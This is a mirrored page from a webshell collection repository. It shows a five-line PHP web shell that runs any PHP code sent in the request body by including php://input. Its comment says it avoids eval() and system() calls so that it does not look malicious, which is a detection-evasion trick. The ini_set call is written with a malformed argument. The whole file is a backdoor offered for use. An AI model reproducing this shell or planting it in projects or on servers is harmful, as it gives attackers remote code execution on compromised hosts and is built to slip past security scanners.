mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
df6d55ad4f
php shell and jsp shell
5 lines
179 B
PHP
5 lines
179 B
PHP
<?php
|
|
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
|
|
// No eval() calls, no system() calls, nothing normally seen as malicious.
|
|
include('php://input');
|
|
?>
|